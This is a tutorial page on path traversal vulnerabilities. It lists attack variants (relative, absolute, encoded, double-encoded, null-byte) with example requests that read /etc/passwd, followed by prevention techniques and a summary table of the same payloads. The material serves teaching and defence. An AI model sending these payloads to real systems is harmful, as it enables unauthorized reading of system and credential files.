Path Traversal

Overview

Directory Traversal is a web security vulnerability that allows an attacker to gain unauthorized access to files and directories stored outside the intended web root directory. This is often possible when an application uses user-supplied input to construct file paths.

Common Attack Variants

1. Relative Path Traversal

Using ../ sequences to traverse directories upwards from the web root.

GET /loadImage?filename=../../../etc/passwd

2. Absolute Path Traversal

Providing an absolute path directly to a sensitive file.

GET /loadImage?filename=/etc/passwd

3. Traversal from a Known Start Path

If the application validates the file path to begin with a specific base directory (e.g., /var/www/images), attackers may still traverse out of it:

GET /loadImage?filename=/var/www/images/../../../etc/passwd

4. Traversal with Escaped Paths

Using non-standard encodings or path tricks like:

GET /loadImage?filename=....//....//....//etc/passwd
GET /loadImage?filename=....\/....\/....\/etc/passwd

5. Traversal Using URL Encoding

To bypass filters that remove ../, encode them:

%2e%2e%2f (for ../)
%252e%252e%252f (double encoded)
Other variants: ..%c0%af, ..%ef%bc%8f

GET /loadImage?filename=..%252f..%252f..%252fetc/passwd

6. Null Byte Injection

If file extensions are validated (e.g., .png required), a null byte %00 may prematurely terminate the string:

GET /loadImage?filename=../../../etc/passwd%00.png

Prevention Techniques

Disallow User-Controlled File Paths
- Do not use user input directly in file retrieval logic.
Input Sanitization
- Strip path traversal sequences (../, ..\, etc.) and URL-encoded forms.
Restrict File Access
- Limit file access to predefined directories using strict whitelists.
Use File Path Whitelisting
- Only allow access to known-safe files using a safelist.
Run with Least Privilege
- Ensure the web server runs with permissions that prevent it from reading sensitive OS files.
Canonicalization Before Validation
- Normalize file paths before validating them to avoid bypasses via encoding or obfuscation.

Summary Examples

Technique

Example URL

Relative traversal

?filename=../../../etc/passwd

Absolute path

?filename=/etc/passwd

Null byte injection

?filename=../../../etc/passwd%00.png

Encoded traversal

?filename=%2E%2E%2Fetc%2Fpasswd

Known base path with relative traversal

?filename=/var/www/images/../../../etc/passwd

Escaped traversal

?filename=....//....//etc/passwd

PreviousSSRF with filter bypass via open redirection vulnerability NextFahemsec

Last updated 9 months ago

hashtagOverview

hashtagCommon Attack Variants

hashtag1. Relative Path Traversal

hashtag2. Absolute Path Traversal

hashtag3. Traversal from a Known Start Path

hashtag4. Traversal with Escaped Paths

hashtag5. Traversal Using URL Encoding

hashtag6. Null Byte Injection

hashtagPrevention Techniques

hashtagSummary Examples